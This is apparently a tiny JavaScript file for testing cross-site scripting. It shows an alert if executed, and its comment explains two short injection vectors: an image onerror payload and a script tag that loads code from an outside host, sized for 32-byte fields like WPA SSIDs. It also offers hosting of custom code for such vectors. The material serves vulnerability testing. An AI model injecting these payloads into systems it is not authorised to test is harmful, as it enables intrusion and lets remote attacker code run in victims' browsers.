alert("This page is XSS vulnerable."); //
console.log("This page is XSS vulnerable."); /*
This page can be embedded to test XSS atacks with little space available. The common shortest XSS vector is
<img src=# onerror=alert()> = 27 characters, but it allows for no custom alert message to be shown.
Use <script src=//x33.li><script> = 30 characters. The vector just fits into 32-byte limited fields (like WPA SSIDs). If the page is XSS-vulnerable an alert window will display "This page is XSS vulnerable".
If you want your own code to be hosted under x33.li/x (which still fits into 32 bytes), you can use my xsshost service. In case you have questions, drop me a note on Twitter.
A project by ciko.io.*/